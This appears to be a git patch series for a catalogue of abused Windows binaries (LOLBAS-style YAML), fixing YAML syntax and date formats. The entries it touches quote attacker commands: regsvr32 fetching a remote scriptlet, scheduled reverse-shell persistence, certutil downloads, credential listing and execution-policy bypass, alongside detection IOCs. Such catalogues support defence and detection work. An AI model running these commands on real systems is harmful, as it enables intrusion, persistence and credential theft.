From de50a47957aa75a5c38c3b1bd83b2e9185222ce7 Mon Sep 17 00:00:00 2001 From: Wietze Date: Sun, 10 Jan 2021 14:46:36 +0000 Subject: [PATCH 01/19] Fix invalid YAML --- yml/LOLUtilz/OtherBinaries/RunCmd_X64.yml | 4 ++-- yml/LOLUtilz/OtherBinaries/aswrundll.yml | 14 ++++++-------- 2 files changed, 8 insertions(+), 10 deletions(-) diff --git a/yml/LOLUtilz/OtherBinaries/RunCmd_X64.yml b/yml/LOLUtilz/OtherBinaries/RunCmd_X64.yml index e458cec..c0ba77e 100644 --- a/yml/LOLUtilz/OtherBinaries/RunCmd_X64.yml +++ b/yml/LOLUtilz/OtherBinaries/RunCmd_X64.yml @@ -21,7 +21,7 @@ Detection: Resources: - Link: https://bartblaze.blogspot.com/2019/03/run-applications-and-scripts-using.html - Link: https://twitter.com/bartblaze/status/1107390776147881984 - Acknowledgement: +Acknowledgement: - Person: Bart - Handle: @bartblaze + Handle: '@bartblaze' --- diff --git a/yml/LOLUtilz/OtherBinaries/aswrundll.yml b/yml/LOLUtilz/OtherBinaries/aswrundll.yml index 72414cc..ce11b14 100644 --- a/yml/LOLUtilz/OtherBinaries/aswrundll.yml +++ b/yml/LOLUtilz/OtherBinaries/aswrundll.yml @@ -1,20 +1,18 @@ Name: aswrundll.exe Description: This process is used by AVAST antivirus to run and execute any modules Author: Eli Salem -Created: 19\03\2019 +Created: 2019-03-19 Commands: - - Command: "C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll" + - Command: "\"C:\\Program Files\\Avast Software\\Avast\\aswrundll\" \"C:\\Users\\Public\\Libraries\\tempsys\\module.dll\"" Description: Load and execute modules using aswrundll Usecase: Execute malicious modules using aswrundll.exe Category: Execute Privileges: Any OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: -- Path: C:\Program Files\Avast Software\Avast\aswrundll -Code_Sample: -- Code: ["C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll" "C:\Users\module.dll"] + - Path: C:\Program Files\Avast Software\Avast\aswrundll Resources: - - Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research - Acknowledgement: + - Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research +Acknowledgement: - Person: Eli Salem - handle: https://www.linkedin.com/in/eli-salem-954728150 + Handle: https://www.linkedin.com/in/eli-salem-954728150 From 14dca38278f914c153856b157c6ecb52669bbd03 Mon Sep 17 00:00:00 2001 From: Wietze Date: Sun, 10 Jan 2021 15:04:52 +0000 Subject: [PATCH 02/19] Standardise date formats (see https://yaml.org/type/timestamp.html) --- YML-Template.yml | 6 +++--- yml/LOLUtilz/OSBinaries/Explorer.yml | 2 +- yml/LOLUtilz/OSBinaries/Netsh.yml | 2 +- yml/LOLUtilz/OSBinaries/Nltest.yml | 2 +- yml/LOLUtilz/OSBinaries/Openwith.yml | 2 +- yml/LOLUtilz/OSBinaries/Powershell.yml | 2 +- yml/LOLUtilz/OSBinaries/Psr.yml | 2 +- yml/LOLUtilz/OSBinaries/Robocopy.yml | 2 +- yml/LOLUtilz/OtherBinaries/AcroRd32.yml | 2 +- yml/LOLUtilz/OtherBinaries/Gpup.yml | 2 +- yml/LOLUtilz/OtherBinaries/Nlnotes.yml | 2 +- yml/LOLUtilz/OtherBinaries/Notes.yml | 2 +- yml/LOLUtilz/OtherBinaries/Nvudisp.yml | 2 +- yml/LOLUtilz/OtherBinaries/Nvuhda6.yml | 2 +- yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml | 2 +- yml/LOLUtilz/OtherBinaries/Setup.yml | 2 +- yml/LOLUtilz/OtherBinaries/Usbinst.yml | 2 +- yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml | 2 +- yml/LOLUtilz/OtherMSBinaries/Winword.yml | 4 ++-- yml/LOLUtilz/OtherScripts/Testxlst.yml | 2 +- yml/OSBinaries/At.yml | 10 +++++----- yml/OSBinaries/Atbroker.yml | 6 +++--- yml/OSBinaries/Bash.yml | 6 +++--- yml/OSBinaries/Bitsadmin.yml | 6 +++--- yml/OSBinaries/Certreq.yml | 4 ++-- yml/OSBinaries/Certutil.yml | 6 +++--- yml/OSBinaries/Cmd.yml | 4 ++-- yml/OSBinaries/Cmdkey.yml | 10 +++++----- yml/OSBinaries/Cmstp.yml | 10 +++++----- yml/OSBinaries/ConfigSecurityPolicy.yml | 8 ++++---- yml/OSBinaries/Control.yml | 6 +++--- yml/OSBinaries/Csc.yml | 12 ++++++------ yml/OSBinaries/Cscript.yml | 6 +++--- yml/OSBinaries/Desktopimgdownldr.yml | 8 ++++---- yml/OSBinaries/Dfsvc.yml | 10 +++++----- yml/OSBinaries/Diantz.yml | 12 ++++++------ yml/OSBinaries/Diskshadow.yml | 6 +++--- yml/OSBinaries/Dnscmd.yml | 6 +++--- yml/OSBinaries/Esentutl.yml | 12 ++++++------ yml/OSBinaries/Eventvwr.yml | 4 ++-- yml/OSBinaries/Expand.yml | 8 ++++---- yml/OSBinaries/Explorer.yml | 4 ++-- yml/OSBinaries/Extexport.yml | 8 ++++---- yml/OSBinaries/Extrac32.yml | 12 ++++++------ yml/OSBinaries/Findstr.yml | 8 ++++---- yml/OSBinaries/Forfiles.yml | 8 ++++---- yml/OSBinaries/Ftp.yml | 4 ++-- yml/OSBinaries/GfxDownloadWrapper.yml | 4 ++-- yml/OSBinaries/Gpscript.yml | 8 ++++---- yml/OSBinaries/Hh.yml | 6 +++--- yml/OSBinaries/Ie4uinit.yml | 8 ++++---- yml/OSBinaries/Ieexec.yml | 12 ++++++------ yml/OSBinaries/Ilasm.yml | 6 +++--- yml/OSBinaries/Infdefaultinstall.yml | 6 +++--- yml/OSBinaries/Installutil.yml | 6 +++--- yml/OSBinaries/Jsc.yml | 8 ++++---- yml/OSBinaries/Makecab.yml | 6 +++--- yml/OSBinaries/Mavinject.yml | 6 +++--- yml/OSBinaries/Microsoft.Workflow.Compiler.yml | 10 +++++----- yml/OSBinaries/Mmc.yml | 6 +++--- yml/OSBinaries/MpCmdRun.yml | 10 +++++----- yml/OSBinaries/Msbuild.yml | 8 ++++---- yml/OSBinaries/Msconfig.yml | 6 +++--- yml/OSBinaries/Msdt.yml | 12 ++++++------ yml/OSBinaries/Mshta.yml | 8 ++++---- yml/OSBinaries/Msiexec.yml | 8 ++++---- yml/OSBinaries/Netsh.yml | 6 +++--- yml/OSBinaries/Odbcconf.yml | 6 +++--- yml/OSBinaries/Pcalua.yml | 6 +++--- yml/OSBinaries/Pcwrun.yml | 6 +++--- yml/OSBinaries/Pktmon.yml | 6 +++--- yml/OSBinaries/Presentationhost.yml | 6 +++--- yml/OSBinaries/Print.yml | 6 +++--- yml/OSBinaries/Psr.yml | 8 ++++---- yml/OSBinaries/Rasautou.yml | 8 ++++---- yml/OSBinaries/Reg.yml | 6 +++--- yml/OSBinaries/Regasm.yml | 8 ++++---- yml/OSBinaries/Regedit.yml | 6 +++--- yml/OSBinaries/Regini.yml | 6 +++--- yml/OSBinaries/Register-cimprovider.yml | 6 +++--- yml/OSBinaries/Regsvcs.yml | 4 ++-- yml/OSBinaries/Regsvr32.yml | 6 +++--- yml/OSBinaries/Replace.yml | 12 ++++++------ yml/OSBinaries/Rpcping.yml | 6 +++--- yml/OSBinaries/Rundll32.yml | 8 ++++---- yml/OSBinaries/Runonce.yml | 8 ++++---- yml/OSBinaries/Runscripthelper.yml | 8 ++++---- yml/OSBinaries/Sc.yml | 8 ++++---- yml/OSBinaries/Schtasks.yml | 8 ++++---- yml/OSBinaries/Scriptrunner.yml | 8 ++++---- yml/OSBinaries/Syncappvpublishingserver.yml | 6 +++--- yml/OSBinaries/Ttdinject.yml | 8 ++++---- yml/OSBinaries/Tttracer.yml | 4 ++-- yml/OSBinaries/Vbc.yml | 8 ++++---- yml/OSBinaries/Verclsid.yml | 8 ++++---- yml/OSBinaries/Wab.yml | 6 +++--- yml/OSBinaries/Wmic.yml | 6 +++--- yml/OSBinaries/Wscript.yml | 6 +++--- yml/OSBinaries/Wsreset.yml | 8 ++++---- yml/OSBinaries/Wuauclt.yml | 4 ++-- yml/OSBinaries/Xwizard.yml | 8 ++++---- yml/OSLibraries/Advpack.yml | 4 ++-- yml/OSLibraries/Ieadvpack.yml | 2 +- yml/OSLibraries/Ieframe.yml | 2 +- yml/OSLibraries/Mshtml.yml | 2 +- yml/OSLibraries/Pcwutl.yml | 4 ++-- yml/OSLibraries/Setupapi.yml | 4 ++-- yml/OSLibraries/Shdocvw.yml | 2 +- yml/OSLibraries/Shell32.yml | 2 +- yml/OSLibraries/Syssetup.yml | 4 ++-- yml/OSLibraries/Url.yml | 2 +- yml/OSLibraries/Zipfldr.yml | 2 +- yml/OSLibraries/comsvcs.yml | 8 ++++---- yml/OSScripts/CL_mutexverifiers.yml | 6 +++--- yml/OSScripts/Cl_invocation.yml | 8 ++++---- yml/OSScripts/Manage-bde.yml | 4 ++-- yml/OSScripts/Pubprn.yml | 6 +++--- yml/OSScripts/Syncappvpublishingserver.yml | 6 +++--- yml/OSScripts/Winrm.yml | 4 ++-- yml/OSScripts/pester.yml | 6 +++--- yml/OtherMSBinaries/Agentexecutor.yml | 8 ++++---- yml/OtherMSBinaries/Appvlp.yml | 4 ++-- yml/OtherMSBinaries/Bginfo.yml | 2 +- yml/OtherMSBinaries/Cdb.yml | 4 ++-- yml/OtherMSBinaries/Csi.yml | 2 +- yml/OtherMSBinaries/DefaultPack.yml | 6 +++--- yml/OtherMSBinaries/Devtoolslauncher.yml | 4 ++-- yml/OtherMSBinaries/Dnx.yml | 4 ++-- yml/OtherMSBinaries/Dotnet.yml | 6 +++--- yml/OtherMSBinaries/Dxcap.yml | 6 +++--- yml/OtherMSBinaries/Excel.yml | 4 ++-- yml/OtherMSBinaries/Mftrace.yml | 2 +- yml/OtherMSBinaries/Msdeploy.yml | 2 +- yml/OtherMSBinaries/Msxsl.yml | 2 +- yml/OtherMSBinaries/Ntdsutil.yml | 4 ++-- yml/OtherMSBinaries/Powerpnt.yml | 4 ++-- yml/OtherMSBinaries/Rcsi.yml | 2 +- yml/OtherMSBinaries/Sqldumper.yml | 2 +- yml/OtherMSBinaries/Sqlps.yml | 2 +- yml/OtherMSBinaries/Sqltoolsps.yml | 4 ++-- yml/OtherMSBinaries/Squirrel.yml | 8 ++++---- yml/OtherMSBinaries/Te.yml | 2 +- yml/OtherMSBinaries/Tracker.yml | 2 +- yml/OtherMSBinaries/Update.yml | 8 ++++---- yml/OtherMSBinaries/Vsjitdebugger.yml | 4 ++-- yml/OtherMSBinaries/Winword.yml | 4 ++-- yml/OtherMSBinaries/Wsl.yml | 2 +- 147 files changed, 407 insertions(+), 407 deletions(-) diff --git a/YML-Template.yml b/YML-Template.yml index 8fae63d..5b3b17a 100644 --- a/YML-Template.yml +++ b/YML-Template.yml @@ -2,7 +2,7 @@ Name: Binary.exe Description: Something general about the binary Author: The person that created this file -Created: Date the person created this file +Created: Date the person created this file (use YYYY-MM-DD without quotes) Commands: - Command: The command Description: Description of the command @@ -23,9 +23,9 @@ Commands: Full_Path: - Path: c:\windows\system32\bin.exe - Path: c:\windows\syswow64\bin.exe -Code_Sample: +Code_Sample: - Code: http://url.com/git.txt -Detection: +Detection: - IOC: Event ID 10 - IOC: binary.exe spawned Resources: diff --git a/yml/LOLUtilz/OSBinaries/Explorer.yml b/yml/LOLUtilz/OSBinaries/Explorer.yml index 99a6348..cdb2ddd 100644 --- a/yml/LOLUtilz/OSBinaries/Explorer.yml +++ b/yml/LOLUtilz/OSBinaries/Explorer.yml @@ -2,7 +2,7 @@ Name: Explorer.exe Description: Execute Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: explorer.exe calc.exe diff --git a/yml/LOLUtilz/OSBinaries/Netsh.yml b/yml/LOLUtilz/OSBinaries/Netsh.yml index d7dd77f..d6fd688 100644 --- a/yml/LOLUtilz/OSBinaries/Netsh.yml +++ b/yml/LOLUtilz/OSBinaries/Netsh.yml @@ -2,7 +2,7 @@ Name: Netsh.exe Description: Execute, Surveillance Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: | diff --git a/yml/LOLUtilz/OSBinaries/Nltest.yml b/yml/LOLUtilz/OSBinaries/Nltest.yml index e0db5ff..390bc03 100644 --- a/yml/LOLUtilz/OSBinaries/Nltest.yml +++ b/yml/LOLUtilz/OSBinaries/Nltest.yml @@ -2,7 +2,7 @@ Name: Nltest.exe Description: Credentials Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: nltest.exe /SERVER:192.168.1.10 /QUERY diff --git a/yml/LOLUtilz/OSBinaries/Openwith.yml b/yml/LOLUtilz/OSBinaries/Openwith.yml index ae20a00..829f41a 100644 --- a/yml/LOLUtilz/OSBinaries/Openwith.yml +++ b/yml/LOLUtilz/OSBinaries/Openwith.yml @@ -2,7 +2,7 @@ Name: Openwith.exe Description: Execute Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: OpenWith.exe /c C:\test.hta diff --git a/yml/LOLUtilz/OSBinaries/Powershell.yml b/yml/LOLUtilz/OSBinaries/Powershell.yml index f8d44e6..eac5ec1 100644 --- a/yml/LOLUtilz/OSBinaries/Powershell.yml +++ b/yml/LOLUtilz/OSBinaries/Powershell.yml @@ -2,7 +2,7 @@ Name: Powershell.exe Description: Execute, Read ADS Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: powershell -ep bypass - < c:\temp:ttt diff --git a/yml/LOLUtilz/OSBinaries/Psr.yml b/yml/LOLUtilz/OSBinaries/Psr.yml index b9b9e45..bf0c3a2 100644 --- a/yml/LOLUtilz/OSBinaries/Psr.yml +++ b/yml/LOLUtilz/OSBinaries/Psr.yml @@ -2,7 +2,7 @@ Name: Psr.exe Description: Surveillance Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: psr.exe /start /gui 0 /output c:\users\user\out.zip diff --git a/yml/LOLUtilz/OSBinaries/Robocopy.yml b/yml/LOLUtilz/OSBinaries/Robocopy.yml index 8ebb462..a4bc42d 100644 --- a/yml/LOLUtilz/OSBinaries/Robocopy.yml +++ b/yml/LOLUtilz/OSBinaries/Robocopy.yml @@ -2,7 +2,7 @@ Name: Robocopy.exe Description: Copy Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: Robocopy.exe C:\SourceFolder C:\DestFolder diff --git a/yml/LOLUtilz/OtherBinaries/AcroRd32.yml b/yml/LOLUtilz/OtherBinaries/AcroRd32.yml index 941436c..0a2b30e 100644 --- a/yml/LOLUtilz/OtherBinaries/AcroRd32.yml +++ b/yml/LOLUtilz/OtherBinaries/AcroRd32.yml @@ -2,7 +2,7 @@ Name: AcroRd32.exe Description: Execute Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary diff --git a/yml/LOLUtilz/OtherBinaries/Gpup.yml b/yml/LOLUtilz/OtherBinaries/Gpup.yml index f5824be..ce35964 100644 --- a/yml/LOLUtilz/OtherBinaries/Gpup.yml +++ b/yml/LOLUtilz/OtherBinaries/Gpup.yml @@ -2,7 +2,7 @@ Name: Gpup.exe Description: Execute Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe diff --git a/yml/LOLUtilz/OtherBinaries/Nlnotes.yml b/yml/LOLUtilz/OtherBinaries/Nlnotes.yml index da4d4cd..a66bdba 100644 --- a/yml/LOLUtilz/OtherBinaries/Nlnotes.yml +++ b/yml/LOLUtilz/OtherBinaries/Nlnotes.yml @@ -2,7 +2,7 @@ Name: Nlnotes.exe Description: Execute Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } diff --git a/yml/LOLUtilz/OtherBinaries/Notes.yml b/yml/LOLUtilz/OtherBinaries/Notes.yml index 8ddb03a..79d3bab 100644 --- a/yml/LOLUtilz/OtherBinaries/Notes.yml +++ b/yml/LOLUtilz/OtherBinaries/Notes.yml @@ -2,7 +2,7 @@ Name: Notes.exe Description: Execute Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } diff --git a/yml/LOLUtilz/OtherBinaries/Nvudisp.yml b/yml/LOLUtilz/OtherBinaries/Nvudisp.yml index a7fd86e..b421a69 100644 --- a/yml/LOLUtilz/OtherBinaries/Nvudisp.yml +++ b/yml/LOLUtilz/OtherBinaries/Nvudisp.yml @@ -2,7 +2,7 @@ Name: Nvudisp.exe Description: Execute, Copy, Add registry, Create shortcut, kill process Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: Nvudisp.exe System calc.exe diff --git a/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml b/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml index 9e13364..c6cdbeb 100644 --- a/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml +++ b/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml @@ -2,7 +2,7 @@ Name: Nvuhda6.exe Description: Execute, Copy, Add registry, Create shortcut, kill process Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: nvuhda6.exe System calc.exe diff --git a/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml b/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml index 853d33e..50e4bfb 100644 --- a/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml +++ b/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml @@ -2,7 +2,7 @@ Name: ROCCAT_Swarm.exe Description: Execute Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe diff --git a/yml/LOLUtilz/OtherBinaries/Setup.yml b/yml/LOLUtilz/OtherBinaries/Setup.yml index 06494de..d777ed7 100644 --- a/yml/LOLUtilz/OtherBinaries/Setup.yml +++ b/yml/LOLUtilz/OtherBinaries/Setup.yml @@ -2,7 +2,7 @@ Name: Setup.exe Description: Execute Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: Run Setup.exe diff --git a/yml/LOLUtilz/OtherBinaries/Usbinst.yml b/yml/LOLUtilz/OtherBinaries/Usbinst.yml index 6b2b33c..abcd144 100644 --- a/yml/LOLUtilz/OtherBinaries/Usbinst.yml +++ b/yml/LOLUtilz/OtherBinaries/Usbinst.yml @@ -2,7 +2,7 @@ Name: Usbinst.exe Description: Execute Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf" diff --git a/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml b/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml index 77de123..3702e0f 100644 --- a/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml +++ b/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml @@ -2,7 +2,7 @@ Name: VBoxDrvInst.exe Description: Persistence Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf diff --git a/yml/LOLUtilz/OtherMSBinaries/Winword.yml b/yml/LOLUtilz/OtherMSBinaries/Winword.yml index 43cddf7..579b05a 100644 --- a/yml/LOLUtilz/OtherMSBinaries/Winword.yml +++ b/yml/LOLUtilz/OtherMSBinaries/Winword.yml @@ -2,7 +2,7 @@ Name: winword.exe Description: Document editor included with Microsoft Office. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: winword.exe /l dllfile.dll Description: Launch DLL payload. @@ -26,4 +26,4 @@ Acknowledgement: Handle: '@@vysecurity' - Person: Adam (Internals) Handle: '@Hexacorn' ---- \ No newline at end of file +--- diff --git a/yml/LOLUtilz/OtherScripts/Testxlst.yml b/yml/LOLUtilz/OtherScripts/Testxlst.yml index 3cf7399..05eb340 100644 --- a/yml/LOLUtilz/OtherScripts/Testxlst.yml +++ b/yml/LOLUtilz/OtherScripts/Testxlst.yml @@ -2,7 +2,7 @@ Name: testxlst.js Description: Script included with Pywin32. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out Description: Test Jscript included in Python tool to perform XSL transform (for payload execution). diff --git a/yml/OSBinaries/At.yml b/yml/OSBinaries/At.yml index fa3d443..5d32b60 100644 --- a/yml/OSBinaries/At.yml +++ b/yml/OSBinaries/At.yml @@ -2,12 +2,12 @@ Name: At.exe Description: Schedule periodic tasks Author: 'Freddie Barr-Smith' -Created: '2019-09-20' +Created: 2019-09-20 Commands: - Command: C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe - Description: Create a recurring task to execute every day at a specific time. + Description: Create a recurring task to execute every day at a specific time. Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive - Category: Execute + Category: Execute Privileges: Local Admin MitreID: T1053 MitreLink: https://attack.mitre.org/wiki/Technique/T1053 @@ -17,10 +17,10 @@ Full_Path: - Path: C:\WINDOWS\SysWOW64\At.exe Detection: - IOC: Scheduled task is created - - IOC: Windows event log - type 3 login + - IOC: Windows event log - type 3 login - IOC: C:\Windows\System32\Tasks\At1 (substitute 1 with subsequent number of at job) - IOC: C:\Windows\Tasks\At1.job - - IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1. + - IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1. Resources: - Link: https://freddiebarrsmith.com/at.txt - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index 013ea5b..897f5f0 100644 --- a/yml/OSBinaries/Atbroker.yml +++ b/yml/OSBinaries/Atbroker.yml @@ -2,7 +2,7 @@ Name: Atbroker.exe Description: Helper binary for Assistive Technology (AT) Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: ATBroker.exe /start malware Description: Start a registered Assistive Technology (AT). @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\Atbroker.exe - Path: C:\Windows\SysWOW64\Atbroker.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration @@ -26,4 +26,4 @@ Resources: Acknowledgement: - Person: Adam Handle: '@hexacorn' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml index 4b34149..6ecdfe8 100644 --- a/yml/OSBinaries/Bash.yml +++ b/yml/OSBinaries/Bash.yml @@ -2,7 +2,7 @@ Name: Bash.exe Description: File used by Windows subsystem for Linux Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: bash.exe -c calc.exe Description: Executes calc.exe from bash.exe @@ -39,7 +39,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\bash.exe - Path: C:\Windows\SysWOW64\bash.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Child process from bash.exe @@ -50,4 +50,4 @@ Acknowledgement: Handle: '@aionescu' - Person: Asif Matadar Handle: '@d1r4c' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Bitsadmin.yml b/yml/OSBinaries/Bitsadmin.yml index 9b0b5e6..dfcc005 100644 --- a/yml/OSBinaries/Bitsadmin.yml +++ b/yml/OSBinaries/Bitsadmin.yml @@ -2,7 +2,7 @@ Name: Bitsadmin.exe Description: Used for managing background intelligent transfer Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1 Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job. @@ -39,7 +39,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\bitsadmin.exe - Path: C:\Windows\SysWOW64\bitsadmin.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Child process from bitsadmin.exe @@ -56,4 +56,4 @@ Acknowledgement: Handle: '@carnal0wnage' - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Certreq.yml b/yml/OSBinaries/Certreq.yml index b9a69bf..4cd1e84 100644 --- a/yml/OSBinaries/Certreq.yml +++ b/yml/OSBinaries/Certreq.yml @@ -2,7 +2,7 @@ Name: CertReq.exe Description: Used for requesting and managing certificates Author: 'David Middlehurst' -Created: '2020-07-07' +Created: 2020-07-07 Commands: - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\certreq.exe - Path: C:\Windows\SysWOW64\certreq.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: certreq creates new files diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index d66a264..081f515 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml @@ -2,7 +2,7 @@ Name: Certutil.exe Description: Windows binary used for handeling certificates Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe Description: Download and save 7zip to disk in the current folder. @@ -44,7 +44,7 @@ Commands: MitreID: T1140 MitreLink: https://attack.mitre.org/wiki/Technique/T1140 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: certutil --decodehex encoded_hexadecimal_InputFileName + - Command: certutil --decodehex encoded_hexadecimal_InputFileName Description: Command to decode a hexadecimal-encoded file decodedOutputFileName Usecase: Decode files to evade defensive measures Category: Decode @@ -55,7 +55,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\certutil.exe - Path: C:\Windows\SysWOW64\certutil.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Certutil.exe creating new files on disk diff --git a/yml/OSBinaries/Cmd.yml b/yml/OSBinaries/Cmd.yml index 1fc9f9f..1d08c32 100644 --- a/yml/OSBinaries/Cmd.yml +++ b/yml/OSBinaries/Cmd.yml @@ -2,7 +2,7 @@ Name: Cmd.exe Description: The command-line interpreter in Windows Author: 'Ye Yint Min Thu Htut' -Created: '2019-06-26' +Created: 2019-06-26 Commands: - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat Description: Add content to an Alternate Data Stream (ADS). @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\cmd.exe - Path: C:\Windows\SysWOW64\cmd.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: cmd.exe executing files from alternate data streams. diff --git a/yml/OSBinaries/Cmdkey.yml b/yml/OSBinaries/Cmdkey.yml index a3b4136..e499adc 100644 --- a/yml/OSBinaries/Cmdkey.yml +++ b/yml/OSBinaries/Cmdkey.yml @@ -1,8 +1,8 @@ --- -Name: Cmdkey.exe +Name: Cmdkey.exe Description: creates, lists, and deletes stored user names and passwords or credentials. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: cmdkey /list Description: List cached credentials @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\cmdkey.exe - Path: C:\Windows\SysWOW64\cmdkey.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Usage of this command could be an IOC @@ -23,6 +23,6 @@ Resources: - Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey Acknowledgement: - - Person: + - Person: Handle: ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index cf8204a..4d68909 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -2,11 +2,11 @@ Name: Cmstp.exe Description: Installs or removes a Connection Manager service profile. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. - Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet. + Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet. Category: Execute Privileges: User MitreID: T1191 @@ 